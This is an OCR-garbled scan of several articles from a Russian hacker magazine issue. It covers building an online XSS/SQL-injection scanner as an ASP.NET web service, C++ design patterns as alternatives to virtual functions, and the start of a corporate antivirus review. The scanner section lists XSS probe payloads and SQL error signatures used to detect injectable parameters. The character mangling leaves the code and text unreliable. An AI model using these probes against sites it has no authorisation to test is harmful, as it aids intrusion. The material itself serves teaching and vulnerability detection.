будет рассмотрен на примере уязвимостей класса «Сгозз- 
5іІе Зсгірііпд» (также известного какХЗЗ], так как на их 
поиске основаны методы обнаружения и других багов (с 
точки зрения сканера как автоматизированного инстру- 
мента]. Тебе, как программисту, нужно будет научить при- 
ложение передавать специальные данные и обрабатывать 
полученные результаты указанным тобой способом. Моя 
же задача — продемонстрировать тебе концептуальные 



особенности программирования веб-сервисов, ну и 
задать направление дальнейшего развития приложения и 
поделиться своими идеями. Но обо всем по порядку. 
Рассмотрим логику работы сканера: 

1. Переход по ссылке на целевой сайт; 

2. Сбор всех скриптов на целевом сайте; 

3. Определение всех параметров, принадлежащих кон- 
кретному скрипту; 

4. Передача собранным параметрам специальных значе- 
ний, характерных для данного вида уязвимостей; 

5. Анализ полученного результата (произошло ли внедре- 
ние наших переданных значений в код страницы]. 

Как видишь, приблизительный алгоритм функционирова- 
ния приложения довольно прост, однако не стоит спешить 
с выводами: у каждого из вышеперечисленных пунктов 
есть свои подводные камни, часть из которых нам придет- 
ся преодолевать вместе, а часть я оставлю тебе в качестве 
домашнего задания. 

НАПИШИ ПРОГРАММУ МЫШКОЙ 

Создается впечатление, что если Майкрософт продолжит 
развивать свои технологии, входящие в комплект .ЫЕТ 
Егатеѵѵогк и среду программирования Ѵізиаі Зіисііо, то 
процесс создания программного обеспечения будет досту- 
пен для широких масс, умеющих собирать конструкторы и 
владеющих только мышкой. 

При создании проекта «А5Р.ЫЕТ ѴѴеЬ Зегѵісе Арріісаііоп» 
студия автоматически формирует структуру каталогов, 
характерную для приложения данного типа, а также соз- 
дает все необходимые файлы для его корректного функ- 
ционирования. Обычно структура проекта содержит в себе 
файлы одного или нескольких ТИПОВ: 

1. А5РХ-файлы, содержащие ѵѵеб-формы; 

2. А5МХ-файлы, которые, собственно, и реализуют ѵѵеЬ- 
сервисы; 

3. файлы ѴѴеЬ.сопГід, в которых описываются параметры 
конфигурации; 

4. файл бІоЬаІ.азах, который содержит глобальные эле- 
менты приложения; 

5. различные ОІ_І_, включающие в себя специфичные для 
приложения типы. 

Файл ІСЬоІеЗсапег.азтх, находящийся в проекте (ищи его 
на нашем диске], демонстрирует несколько важных прин- 
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• ѵѵѵѵѵѵ.ѵѵЗ.огд/ТР/ 
зоар/ - описание 
спецификации про- 
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ешься создавать при- 
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тирующие методы 
твоего веб-сервиса. 
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сурс, где ты можешь 
задать вопросы, по- 
делиться идеями, 

а также поучаство- 
вать в разработке 
различных приложе- 
ний и проектов. 
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Схема работы веб-сервиса 



ципов программирования веб-сервисов с помощью .ЫЕТ Ргатеѵѵогк. 
Вот что в нем содержится: 

Содержимое А5МХ-файла 

<% 

@ МеЬЗегѵісе Ьапдиаде= " С# " 

СосіеВеІііпсН " ~/Арр_Сос1е/ІС]то1еЗсапег . сз " 

С1азз= " ІСЬоІеЗсапег " 



Директива (сіѴѴеЬЗегѵісе содержит обязательный атрибут Сіазз, задаю- 
щий класс, из которого состоит веб-сервис, и атрибут СобеВеЫпб, 
который содержит описание веб-методов класса. 

Веб-методы объявляются в файле ІСЬоІеЗсапег.сз путем назначения 
открытым методам класса ‘‘ІСЬоІеЗсапег” атрибута [ѴѴеЬМеіЬосІ]. Таким 
образом .ЫЕТ Ргатеѵѵогк автоматически делает этот метод доступным 
для внешних вызовов. 

[ОДеЬМеСЬосІ] 

риЫіс зСгіпд ЗСагШЗсап ( зСгіпд сіотеп) 

{ 

/ / инструкции метода 

} 

В этом отражается вся суть веб-сервиса — предоставить функционал 
своих методов (то есть, предоставить «сервис») для обработки данных, 
поступающих от клиента, который может являться как обычным поль- 
зователем, передающим информацию через какие-либо поля ввода, 
так и программой (сайтом), предоставляющим свои данные в автома- 
тическом режиме средствами НТТР и ЗОАР. 50АР — это ХМЕ-язык для 
вызова удаленных процедур по НТТР и другим протоколам. 

Наш веб-сервис предоставляет метод ЗіагіЗсап, который принимает 
единственный строковой параметр — доменное имя целевого сайта, 

— и инициализирует процедуру сканирования. Если ИРЕ сервиса, 
например, ѵѵѵѵѵѵ.зке.сот/ісЬоІезсапег.азтх . то клиент может вызвать 
метод ЗЕагЕЗсап, переслав ЗОАР-конверт в НТТР-запросе. Задача веб- 
сервиса в этом случае: 

1. Разобрать ЗОАР-конверт, содержащий входные данные; 

2 . Выполнить сканирование; 

3. Сгенерировать ЗОАР-конверт, содержащий результат; 

4 . Возвратить его клиенту в теле НТТР-отклика. 



Также параметры сканирования можно задавать с помощью обычных 
НТТР-команд ОЕТ и Р05Т, например: 

СЕТ /ісЬоІезсапег . азтх/ЗРагСЗсап?сіотеп=ѵ\Пллѵ. епетузіСе . 

сот НТТР/ 1.1 

НозС : шяѵі . зіСе . сот 

После того, как мы рассмотрели особенности создания и функциони- 
рования веб-сервисов и их принципиальное отличие от обычных веб- 
приложений (которые функционируют в закрытом режиме, не предо- 
ставляя никому свои методы), ты уже можешь начинать писать свой 
сервис, аналогов которому нет в онлайн-приложениях, но полным- 
полно на пользовательских компьютерах. Однако я настоятельно 
рекомендую не останавливаться на полученных знаниях, а перейти к 
следующему этапу, на котором мы сможем реализовать процесс обна- 
ружения ХЗЗ-уязвимостей. 

ДА У ВАС ЖУКИ, БАТЕНЬКА! 

Уязвимости класса «межсайтовый скриптинг», как известно, являются 
следствием неправильной работы фильтра, принимающего входные 
данные от пользователя. Таким образом, хакер может вставить в 
исходный код страницы свой набор символов (в подавляющем боль- 
шинстве случаев это ^ѵаЗсгірі-код], который впоследствии может 
скомпрометировать легитимного пользователя, открывшего страницу. 
Различают два подтипа ХЗЗ-уязвимостей: активные и пассивные. В 
двух словах: первые встраиваются непосредственно в код страницы, 
и пользователю достаточно ее открыть, а вторые требуют активности 
со стороны компрометируемого (например, переход по специально 
сформированной ссылке). За подробностями атак этого типа я отправ- 
лю тебя... нет, не к гуглу, а к сноскам в этой статье, где собран список 
полезных ресурсов, призванных обогатить тебя информацией по дан- 
ному вопросу. Для программиста различия в уязвимостях сервиса не 
играют никакой роли, ведь так или иначе они являются следствием 
некорректной фильтрации, поэтому не будем дальше заострять вни- 
мание на описании багов, а перейдем непосредственно к их обнару- 
жению средствами онлайн-сканера. Для начала нам нужно составить 
список всевозможных скриптов, имеющихся на исследуемом ресурсе. 
Как это сделать, — однозначного ответа дать не смогу, так как подходы 
к этой задаче у каждого свои, и скорость ее выполнения может замет- 
но отличаться. С другой стороны, зачем нам лишние заботы? Пусть 
пользователь сам укажет тот скрипт, который хочет проверить. 

После того, как у нас появился СПІ_-адрес скрипта, нам необходимо 
получить генерируемый им исходный код страницы и записать его в 
какую-нибудь переменную для последующего анализа. Делается это 
просто: 

Получение НТМІ_-кода страницы 

//формирование запроса к скрипту 
МеЬКедиезС гедиезС = 

МеЬКедиезЦ . СгеаСе (ІІГІ+ " ? " +РагатеСгз ) ; 

/ /получение ответа 

ШеЪКезропзе гезропзе = гедиезС . СеРЕезропзе ( ) ; 

//запись полученного ответа в строковую переменную 
ЗСгеатКеасіег геасіег = пеѵѵ 

ЗСгеатКеасІег (гезропзе . СеСКезропзеЗЦгеат ( ) ) ; 
СопРепС = геасіег . КеасІТоЕпсі () ; 
геасіег . Сіозе ( ) ; 

Имея на руках исходный код страницы, нужно определить количество 
параметров, принимаемых скриптом, чтобы проверить корректность 
их фильтрации. Сделать это можно двумя способами: определить 
на странице все формы для ввода каких-либо данных или же про- 
парсить полученный НТМІ_-код на наличие строк вида "/зсгірЕ 
рЬр?а=аЬссІ&Ь=1 234", где зсгірІ.рЬр — имя исследуемого скрипта. Во 
втором случае у нас в распоряжении будет находиться вся мощь регу- 
лярных выражений. 



► 102 



ХАКЕР 06 /137/ 10 






Реклама 



ѴѴѴѴѴѴ.ХАКЕР.КЦ 
ХАКЕРСКАЯ ПОЧТА 
В ДОМЕНЕ гаХАКЕР.РУ 
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После того, как параметры скрипта собраны и аккуратно помещены 
в массив, наступает самый интересный момент — подстановка «ядо- 
витых» запросов и анализ полученных ответов. Под «ядовитыми» 
запросами понимается такое значение, передаваемое параметру, 
которое вызовет выполнение запланированного нами действия, 
например, внедрение в исходный код страницы нашего тега 
^ѵа5сгірІ-кода и т.п. Коллекция таких «ядовитых» строк собрана в 
массиве ХЗЗгециезІ:. Вот несколько элементов этого массива: 

зСгіпдП ХЗЗгедиезС = 

{ "<зсгірЦ>а1егЦ ( ) </зсгірС>" , 

"<ІМС ЗКС=\ " з аѵазсгірр : аіегр ( ) ; \ , 

" <ІМС ЗКС=з аѵазсг ірр : аІегС ( &диоС ; ХЗЗ&диоС ; ) > " , 

} 

Поочередно подставляя их в каждый из собранных параметров, необ- 
ходимо анализировать ответ на наличие внедренного ^ѵаЗсгірі-кода. 
Другими словами, нужно каждый раз парсить исходный НТМІ_-код, 
полученный после отправки запроса, на наличие искомой последова- 
тельности символов. 

ПРО 8Ш.-Ш, РНР-ШС И ПРОЧУЮ НЕЧИСТЬ 



Распространенные уязвимости прочих классов хоть и имеют другую 
природу и способы эксплуатации, но все же находятся одинаковым, с 
точки зрения автоматизированного поиска, способом. 

Рассмотрим, например, 50І_-инъекции — уязвимости, позволяющие 
хакеру изменить логику запроса скрипта к базе данных. Ошибки 
этого типа также, в подавляющем большинстве случаев, являются 
следствием некорректной обработки поступающих от пользователя 
данных, а это значит, что нам не придется менять алгоритмы поиска 
в нашем сканере. Достаточно создать массив «ядовитых» запросов, 
характерных для уязвимостей подобного типа, и проанализировать 
реакцию скрипта (полученный НТМІ_-код + регулярные выражения]. 
Вот небольшой список характерных ответов 501-сервера, говорящих 
о возможности проведения атаки: 

зСгіпд[] ЗОЬЕггогз = { "туздІ^еСсЪ." , 

"тузд1_диегу " , " \ \ [ оЬсіс " , "тузді еггог" , 

"уст Ьаѵе ап еггог іп уоиг здІзупСах" , 

"осіЬс сігіѵегз еггог", " \ \ [тісгозоіЩ зді" 





Аиаскег 
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}; 



Существуют еще и «слепые» 501-инъекции, которые в силу своей 
природы не вносят изменения в исходный код страницы и, как след- 
ствие, не подлежат обнаружению простым парсингом страницы. С дру- 
гой стороны, тебе открывается широкий спектр атак, дающий повод 
для постоянного совершенствования своего продукта. 

ПАСМУРНО, НО БЕЗ ОСАДКОВ 

Перспектива развития облачных технологий и веб-сервисов стано- 
вится заметна не только крупным компаниям и конечным пользо- 
вателям. С развитием технологий создания веб-приложений раз- 
работчики приобретают возможность воплотить самые яркие идеи, 
которые уже давно реализованы в качестве стандартных (оффлай- 
новых) приложений и востребованы у пользователей персональных 
компьютеров. Кому-то важна финансовая сторона дела, кто-то 
гонится за оригинальностью, а кто-то просто находится «на волне» 
и за пару часов создает продукт, приносящий пользу как юзеру, так 
и своему создателю. Если тема онлайн-сервисов вообще и онлайн- 
сканера уязвимостей в частности стала тебе интересна, и ты решил 
попробовать себя в этом направлении, то прошу не держать в себе 
накопившиеся вопросы, а смело задавать их мне — разберемся 
вместе. Облачных тебе приложений на работе и безоблачной погоды 
во время отпуска!, т 



Приблизительная статистика распространенности веб-уязвимостей 

ІпскЯнН г ГИДО псу Ъу ШАЗС ть*ш а***И1с«эдп (Ш04 К#да1*4 ІпсМніІя 0«1у) 



301 Ііцесбоп 
9% 



Сге4*пйа1г/$еггі0<і РгесЪеЪоп 
9% 



О^ФгсЛАгЛполп 

3$% 
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27% 
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РЕКОМЕНДОВАННАЯ ЦЕНА ЖУРНАЛА 1 00 РУБ. 



О ПОДВЕСКА 

ЗНАЕТ ВСЕ САМА 

КАК РАБОТАЮТ АДАПТИВНЫЕ 
АМОРТИЗАТОРЫ И НЕ похоронят ли 
ОНИ РЕГУЛИРУЕМУЮ ПОДВЕСКУ 



ВЫБОР ТАЧКИ 
ЗА 5 МИНУТ 

ХЭТЧВЕК НА АВТОМАТЕ 
С МОТОРОМ ОБЪЕМОМ 1.6 ЛИШЬ 
ШЯОНАг СкШ ИЛИ МАШ 3? 



е ДОРОГАЯ 
ПЕРЕДАЧА 

ТЮНИНГ-РЯДЫ ДЛЯ КПП 
ПЕРШЕПРИВОДНЫХ ВАЗОВг 

КАШИ от них ПРОК? 



ПЕРВЫЙ АВТОМОБИЛЬНЫЙ ЖУРНАЛ ДЛЯ МОЛОДЁЖИ 



Реклама 



уже в продаже! 



реклама 







КОДЕРСКИЕ 

ТИПСЫИТРИКСЫ 

Правила кодинга на С++ для настоящих спецов 

В ЭТОТ РАЗ МЫ ОТСТУПИМ ОТ ПРИВЫЧНОГО ФОРМАТА «3-Х ПРАВИЛ». 
У НАС БУДЕТ ВСЕГО ОДНА. НО ОЧЕНЬ ИНТЕРЕСНАЯ ТЕМА. РЕЧЬ ПОЙДЕТ 
ОБ АЛЬТЕРНАТИВАХ ВИРТУАЛЬНЫМ ФУНКЦИЯМ. АЛЬТЕРНАТИВЫ 
ЭТИ БУДУТ РЕАЛИЗОВЫВАТЬСЯ С ПОМОЩЬЮ ПАТТЕРНОВ 
ПРОЕКТИРОВАНИЯ. 

Предположим, что мы работаем над какой- 
нибудь видеоигрой и проектируем иерархию 
игровых персонажей. Практически во всех 
играх надо с кем-то сражаться и кого-то уби- 
вать, наша игрушка тоже не исключение. Все 
персонажи могут подвергаться ранениям 
или как-то иначе терять жизненные силы. 

Поэтому мы решаем включить в базовый 
класс иерархии персонажей функцию-член 
ЬеаІіЬѴаІие, которая возвращает целочис- 
ленное значение, показывающее, сколько 
«жизни» осталось у персонажа. Поскольку 
разные персонажи могут вычислять свою 
жизнь по-разному, то в голову сразу при- 
ходит мысль объявить функцию ЬеаІіЬѴаІие 
виртуальной: 

Функция ИеаКИѴаІие 

сіазз СашеСЬагасСег { 
риЫіс : 



// возвращает жизненную силу 
персонажа 

//в производных классах 
можно переопределить 

ѵігСиаІ іпС ЬеаІЬЪѴаІие ( ) 

сопзС ; 



} ; 



Тот факт, что мы не объявили функцию 
ЬеаІіЬѴаІие как чисто виртуальную, 
означает, что предполагается некоторая ее 
реализация поумолчанию. 

Этот подход настолько очевиден, что сразу 
придет в голову практически любому про- 
граммисту. Но эта очевидность в некоторой 
степени мешает нам внимательнее рас- 
смотреть задачу и поискать более удачный 
способ реализации нашей иерархии 
классов. 



"иг 




«шаолонныи метод» 
и идиома ні 
ного интерфейса' 

Начнем с интересной концепции, согласно 
которой виртуальные функции почти всегда 
должны быть закрытыми. Сторонники этой 
концепции предлагают оставить функцию 
ЬеаІіЬѴаІие открытой, но сделать ее не вир- 
туальной и заставить закрытую виртуальную 
функцию, например боНеаІіЬѴаІие, которая 
и выполнит реальную работу. 

Идиома не виртуального 
интерфейса 

сіазз СашеСЬагасСег 



{ 

риЫіс : 



іпС ЪеаІШтѴаІие ( ) сопзС 
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{ 

/ / выполнить предварительные действия 

іпД геСѴаІ = <ЗоНеаІСЪ.Ѵа1ие ( ) ; 

// выполнить завершающие действия 

} 

ргіѵаСе : 

// алгоритм по умолчанию 

// производные классы могут переопределить 
ѵігСиаІ іпС сІоНеаІСІіѴаІие ( ) сопзС 
{ 

} 

} ; 



Основная идея этого подхода — дать клиентам возможность вызы- 
вать закрытые виртуальные функции опосредованно, через откры- 
тые не виртуальные функции-члены. Данный подход известен под 
названием «идиома не виртуального интерфейса» или поп-ѵИиаІ 
іпіегі'асе ісііоіп ( N VI ) . Он представляет собой частный случай более 
широкого паттерна проектирования — «Шаблонный метод». Также 
не виртуальную функцию ИеаШіѴаІие можно называть оберткой 
виртуальной функции. 

Преимущество идиомы N VI заключается в коде, скрытом за 
комментариями «выполнить предварительные действия» и 
«выполнить завершающие действия». Подразумевается, что 
перед и после выполнения виртуальной функции, обязательно 
будет выполнен некоторый код. Таким образом, обертка на- 
строит контекст перед вызовом виртуальной функции, а после 
— очиститего. Например, предварительные действия могут 
заключаться в захвате мьютекса, записей некоторой информа- 
ции влогит.д. Позавершению будет выполнено освобождение 
мьютекса, проверка инвариантов класса и все остальное. Если 
позволить клиентам напрямую вызвать виртуальную функцию, 
то будет очень затруднительно провести такую предваритель- 
ную подготовку. 

Стоит обратить внимание на то, что мы объявили нашу виртуальную 
функцию боНеаШіѴаІие закрытой, а не защищенной, то есть, про- 
изводный класс может определять ее поведение, ноне может вы- 
зывать ее. Некоторым это может показаться странным, но здесь нет 
противоречия: определение поведения функции и вызов функции 
в определенное время — это две совершенно независимые друг от 
друга вещи. 
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В некоторых случаях виртуальную функцию-член можно сделать 
защищенной, а не закрытой. Например, если бы наша функция 
боНеаШіѴаІие из производного класса вызывала одноименную 
функцию из базового класса, то ее пришлось бы объявить защи- 
щенной. Также виртуальную функцию можно сделать открытой, но к 
этому случаю идиома N VI уже неприменима. 

Паттерн «Стратегия» 
и указатели на функции 

Идиома N VI — это интересная альтернатива открытым виртуальным 
функциям, но, с точки зрения проектирования, она дает не слишком 
много — мы по-прежнему используем виртуальные функции для 
вычисления жизни каждого персонажа. Гораздо более сильным 
решением с этой точки зрения было бы утверждение о том, что вы- 
числения жизненной силы не зависят от типа персонажа и, более 
того, не являются его свойством кактакового. Другими словами, за 
эти вычисления будет отвечать функция, не являющаяся членом 
класса. Например, мы можем передавать конструктору класса ука- 
затель на функцию, которая осуществляет вычисления жизненной 
силы. 

Пример паттерна «Стратегия» 

// опережающее описание 
сіазз СатеСЬагасСег ; 

// функция по умолчанию для вычисления жизненной силы 
іпС сіеІаиІЦНеаІСЬСаІс ( сопзС СатеСЬ.агасСег& ) ; 

сіазз СашеСЬагасСег { 
риЫіс : 

Суресіеі іпС ( *Неа1ЫэСа1сРипс ) (сопзС 
СатеСЬагасСег&) ; 

ехріісід СашеСЬагасСег (НеаІЫзСаІсРипс 
Ъ.сІ = сІеІаиІСНеаІЫоСаІс) 

: ЬеаІЫоРипс ( йсі ) 

{} 

іпС йеаШЬѴаІие ( ) сопзС 
{ геСигп ЬеаШйРипс ( *СЪ.із ) ; } 

ргіѵаСе : 

НеаІСЬСаІсРипс йеаІЫзРипс ; 

} ; 

Итак, мы привели простой пример реализации другого рас- 
пространенного паттерна проектирования — «Стратегия». По 
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сравнению с подходами, основанными на виртуальных функ- 
циях в иерархии ВаппеСЬагасІег, он предоставляет некоторые 
повышающие гибкость кода преимущества. Одним из таких 
преимуществ является то, что разные экземпляры персонажей 
одного и того же класса могут иметь разные функции вычисле- 
ния жизни. 

Одно из преимуществ паттерна «Стратегия» 

сіазз ЕѵіІВасІСау: риЫіс СатеСкагаскег { 
риЫіс : 

ехріісіб ЕѵіІВасІСау (НеаШЬСаІсЕипс 
Ъ.сІ = беіаиІкНеаІбкСаІс) 

: СатеСкагасбег (ЬЫ ) 

(...) 

) ; 

// функции вычисления жизни с разным поведением 
іпб ІозеНеаібкОиіскіу ( сопзб СатеСкагасбег& ) ; 
іпб ІозеНеаібкЗіоЫу ( сопзб СатеСкагасбег& ) ; 

// однотипные персонажи с разным поведением 
// относительно здоровья 
ЕѵіІВасІСау еЬдІ ( 1озеНеа1бЪ.С>иіск1у ) ; 

ЕѵіІВасІСау еЪд2 ( ІозеНеаІбкЗІоЫу ) ; 

Другой плюс данного паттерна заключается в том, что функция 
вычисления жизненной силы для одного и того же экземпляра 
класса может изменяться стечением времени. Например, класс 
СатеСЬагасІег может иметь функцию-член зеЖеаІіЬСаІсиІаІюг, 
которая позволяет заменить текущую функцию расчета жизни. 

У этого подхода есть и свои недостатки. Тот факт, что функция вычисле- 
ния жизненной силы больше не является функцией -член ом иерархии 
ОаппеСЬагасІег, означает, что она не имеет доступа к внутреннему 
состоянию объекта, чью жизненную силу она вычисляет. В этом нет 
ничего страшного, если доступ кэтим состояниям предоставляется 
через открытые интерфейсы класса, но иногда этого бывает недоста- 
точно. Такого рода проблемы возникают всегда, когда некоторая функ- 
циональность выносится из класса наружу. Они будут встречаться и 
далее, так как все следующие проектные решения, которые нами будут 
рассматриваться, так или иначе используют функции, находящиеся 
вне иерархии ОатеСЬагасІег. Единственный способ разрешить функ- 
циям, не являющимся членами класса, доступ кего закрытой части 
— ослабить степень инкапсуляции. Например, класс можетобъявить 
функции-нечлены друзьями, либо предоставить открытые функции 
для доступа кзакрытым частям класса. В каждом конкретном случае 
следует самостоятельно определяться с решением, поскольку от этого 
в большой степени зависит дальнейший ход разработки программы. 

Паттерн «Стратегия» 
и класс Іг1::типсІіоп 

Класс 1x1 : :іи псіі о п дарит нам еще большую гибкость по сравнению с 
предыдущей реализацией паттерна «Стратегия» с помощью указа- 



телей на функции. Объект типа Тг: :іи псііо п может содержать любую 
вызываемую сущность (указатель на функцию, функциональный 
объект либо указатель на функцию-член], чья сигнатура совместима 
с ожидаемой. Вот пример использования (гі чіипсбоп; 

Пример использования Ігі ::Типс(іоп 

сіазз СатеСкагасбег ; 

іпб бебаиІбНеаІбкСаІс ( сопзб СатеСкагасбег& ) ; 

сіазз СатеСкагасбег { 
риЫіс : 

// НеаІбкСаІсЕипс — любая вызываемая 
// сущность, которой можно в качестве 
// параметра передать нечто, совместимое 
//с СатеСкагасбег, и которая возвращает 
/ / нечто совместимое с іпб 

буребеб збб. : : бгі бипсбіоп<іпб (сопзб 
СатеСкагасбег& ) > НеаІбкСаІсЕипс ; 

ехріісіб СатеСЬагасбег (НеаЫІіСаІсЕипс 
ксі = беіаиІкНеаІЫтСаІс ) 

: кеаІЫгЕипс (ксі ) 

{} 

іпб кеаЫкѴаІие ( ) сопзб 
( 

гебигп ЬеаШіЕипс ( *бЫз ) ; 

) 



ргіѵабе : 

НеаІккСаісЕипс кеаІЫгЕипс ; 

) ; 

Как видишь, НеаІіЬСаІсРипс — это (уребер описывающий конкрети- 
зацию шаблона (гсіипсбоп. А значит, он работает как обобщенный 
указатель на функцию. Объекттипа НеІіЬСаІсРипс может содержать 
любую вызываемую сущность, чья сигнатура совместима с заданной. 
Быть совместимой в данном случае означает, что параметр можно 
неявно преобразовать в сопзі: (ЗатеСЬагас1:ег&, а тип возвращаемо- 
го значения неявно конвертируется в іпР 

Если сравнить с предыдущим вариантом, где ОатеСЬагасІег вклю- 
чал в себя указатель на функцию, то мы не увидим почти никаких 
отличий. Несмотря на то, что разница не особенно очевидна, на деле 
мы получаем большую степень гибкости в спецификации функций, 
вычисляющих жизненную силу: 

Вся МОЩЬІГІ::ТиПСІІОП 

// функция вычисления жизненной силы 
зіюгб саІсНеаЫЬ (сопзб датеСЪ.агасбег& ) 

// класс функциональных объектов, 

// вычисляющих жизненную силу 
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зСисС НеаІЫтСаІсиІаСог { 

іпС орегаСог ( ) (сопзС СатеСЪ.агасДег&) сопзС 

{...} 

} ; 

сіазз СашеЬеѵеІ { 
риЫіс : 

// функция-член для вычисления жизни 
ІІоаЬ ЪеаІЬЪ. (сопзЬ СатеСЪ.агасЬег& ) сопзЬ; 

} ; 

сіазз ЕѵіІВасіСау: риЫіс СатеСЬагасЬег { 

} ; 

сіазз ЕуеСапйуСЬагасЬег : риЫіс СатеСИагасЬег { 

} ; 

ЕѵіІВасіСау еЬдІ (саІсНеаІЫг) ; 

ЕуеСапсіуСЬагасЕег ессі (НеаІЫгСаІсиІаЬог ( ) ) ; 
СашеЬеѵеІ сиггепЬЬеѵеІ ; 



ЕѵіІВасіСау еЬд2 ( 

зЬсІ: :Ьг1: : Ьіпсі ( &СатеЬеѵе1 : :Ьеа1Ыі, 
сиггепЬЬеѵеІ , 

_ 1 ) 

} ; 

Для вычисления жизненной силы персонажа еЬд2 следует ис- 
пользовать функцию-член класса ОатеІ_еѵеІ. Но из объявления 
0атеІ_аѵеІ::ЬеаШ~і следует, что она должна принимать один пара- 
метр (ссылку на ВатеВЬагазІег), а на самом деле принимает два, 
потому что имеется еще неявный параметр типа СатеІ_еѵеІ — тот, 
на который внутри нее указывает 1Ыз. Все функции вычисления 
жизненной силы принимают лишь один параметр. Если мы ис- 
пользуем функцию 0атеЕеѵеІ::ЬеаШ~і, то должны каким-то образом 
адаптировать ее, чтобы вместо двух параметров она принимала 
только один. В этом примере мы хотим для вычисления здоровья 
еЬд2 в качестве параметра типа ВатеЕеѵеІ всегда использовать 
объект сиггепЫеѵеІ, поэтому привязываем его как первый пара- 
метр при вызове ВатеЕеѵеЕіЬеаШз. Именно в этом и заключается 
смысл вызова 1x1 :: Ьіпсі — указать, что функция вычисления жизни 
еЬд2 должна в качестве объекта типа ВатеЕеѵеІ использовать 
сиггепіЕеѵеЕ 

«Классический» паттерн «Стратегия» 

Традиционный подход к реализации паттерна «Втратегия» состоит в 
том, чтобы сделать функцию вычисления жизненной силы виртуаль- 



ной функцией-членом в классах, принадлежащих отдельной иерар- 
хии. В коде это будет выглядеть примерно так: 

Классическая реализация паттерна «Стратегия» 

// опережающее описание 

сіазз СатеСЬагасЬег ; 
сіазз НеаІЫіСаІсЕипс { 
риЫіс : 



ѵігЬиаІ іпЬ са1с(сопзЬ СатеСЬагасЬег& дс)сопзЬ 

{...} 

} ; 

НеаІЫіСаІсЕипс ЬеіаиІЬНеаІЫіСаІс ; 
сіазз СатеСЬагасЬег { 
риЫіс : 

ехріісіь СатеСЬагасЬег (НеаІЫіСаІсЕипс 
*рЬсі = &сіеіаиІЦНеаІС]тСа1с ) 

: рНеаІЫіСаІс (рЬсі: ) 

{} 

іпЬ ЬеаІЫіѴаІие ( ) сопзЬ 

{геЬигп рНеаЫЬЕипс->са1с ( ЧМз) ; } 

ргіѵаЬе : 

НеаІЫіСаІсЕипс *рНеа1ЫіЕипс ; 

} ; 

Здесь ВатеВЬагаЫег — корень иерархии, в которой Еѵі ІВа сі Вау 
и ЕуеВапбуВбагаЫег являются производными классами. 
НеаШзВаІсЕипс — корень иерархии, в которой производными 
классами являются ЗІоѵѵНеа ИЬ Еоозег и ЕазЖеаІіЬЕоозег. Каждый 
объект типа ВатеС бага сіе г содержит указатель на объект из иерар- 
хии НеаІіЬСаІсЕипс. 

Этот подход привлекателен прежде всего тем, что он предоставляет 
возможность модифицировать существующий алгоритм вычисления 
жизненной силы путем добавления производных классов в иерар- 
хию НеаІіЬСаІсЕипс. 

Заключение 

Из моей сегодняшней статьи можно извлечь одну практическую ре- 
комендацию: размышляя над тем, как решить стоящую перед тобой 
задачу, имеет смысл рассматривать не только виртуальные функции. 
В следующий раз мы продолжим ковырять В++ вглубь и вширь. До 
встречи! т 
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I Сергей «дгіпсіег» Яремчук дгіпгіеггазупаск.ги 



Санитарная, 
обработка офиса 

ВЫБИРАЕМ КОРПОРАТИВНЫЙ АНТИВИРУС 

Антивирусных решений для защиты корпоративной сети сегодня на 
рынке более чем достаточно. Отобилия брендов рябит в глазах, засве- 
тились какзарубежные производители.таки отечественные. Втаких 
условиях выбрать действительно подходящее решение очень сложно. 
Обычные критерии отбора, которыми руководствуются пользователи 
домашних компов, здесь не прокатят, так как на первый план выходят 
удобство управления и развертывания, а также поддержка нужных ОС 
и приложений. 



КАК БУДЕМ ВЫБИРАТЬ? 

Современный офис может насчитывать не один 
десяток, а то и сотню компьютеров, не говоря 
уже о наличии нескольких серверов, играющих 
самую разную роль: почтовый, файловый, кол- 
лективной работы и так далее. Использование 
обычных антивирусов, которые мы привыкли 
видеть на десктопах, в таких условиях крайне 
затруднительно. Ведь управление домашними 
версиями производится непосредственно с 
рабочего места, а пробежаться по нескольким 
сотням компьютеров, чтобы проверить, напри- 
мер, как накатилось обновление, физически 
невозможно (использование средств удаленно- 
го администрирования здесь тоже не вариант) . 
Доверить эту операцию пользователю — значит 
подвергнуть сеть опасности и свести на нет 
все усилия по защите. Да и фактически так мы 
лишаем себя части хлеба, каждый же должен 
выполнять свою работу. Именно поэтому рынок 
антивирусных корпоративных систем разви- 
вается по своим законам, и борьба за заказчика 
ведется очень серьезная, ведь антивирь обычно 
выбирают один раз и потом дружат с ним мно- 
гие годы. 

Корпоративные решения строятся по схеме 
«клиент-сервер», процесс управления на 
всех этапах от установки до обновления баз и 
сбора данных о работе агентов производится с 
удаленной консоли. Серверная часть содержит 
базу данных ЗС^Ь, при этом для небольших сетей 
обычно хватает возможностей, заложенных 
во встроенной базе, поставляемой бесплатно 



вместе с дистрибутивом. В целях экономии 
интернет-трафика обновление антивирусных 
клиентов производится с внутреннего сервера. 
На этом общее между корпоративными анти- 
вирусами заканчивается. Каждая реализация 
имеет свои особенности: поддержка ОС и 
платформ для сервера и клиентов, привязка к 
специфическому ПО (например, ИЗ или ЗС^Ь 
Зегѵег), функциональность клиентских моду- 
лей, локализация. И, конечно же, есть отличия в 
цене и специфике лицензирования. Во всех этих 
вопросах мы и попробуем разобраться. 

В сегодняшний обзор в качестве подопытных 
попали: 

• Казрегзку Ореп Зрасе Зесигііу (К055, казрегзкѵ. 
ги) — линейка продуктов Лаборатории Каспер- 
ского для защиты корпоративных сетей любого 
масштаба и сложности; 

• Бг.ѴѴеЬ Епіегргізе ЗиЛе (ЕЗ. бг\/ѵеЬ.сот) — ре- 
шение для защиты рабочих станций и файловых 
серверов ѴѴіпсІоѵѵз, почтовых серверов Шіх на 
предприятиях любого размера; 

• Е5ЕТЖЮ32 Зтагі Зесигііу Визіпезз ЕсИгіоп 
(53ВЕ, езеіпосШ.ги) — комплексная защита 
серверов и рабочих станций ѴѴіпсіоѵѵз и Ііпих; 

• аѵаы! Епіегргізе ЗиЛе (аѵазі.сот/ги-ги) — ли- 
нейка продуктов для защиты рабочих станций 
ѴѴіпсіоѵѵз, ѴѴіпсіоѵѵз и Ііпих серверов, а также 
продуктов Кегіо МаіІ/ѴѴіпКоиіе; 

• Зутапіес Епброіпі Ргоіесііоп (5ЕР, зутапіес. 
сот/ги) — дальнейшее развитие Зутапіес 
АпііѴішз Согрогаіе Есііііоп с улучшенными функ- 
циями предотвращения угроз. 



Именно эти решения находятся в ТОП при поис- 
ке на специализированных ресурсах. 

КОМПЛЕКТАЦИЯ И ВОЗМОЖНОСТИ 
Ка5рег5ку Ореп Брасе Зесигііу 

Линейка К055 состоит из нескольких про- 
дуктов (около 20), обеспечивающих защиту 
самых разнообразных ресурсов: рабочих 
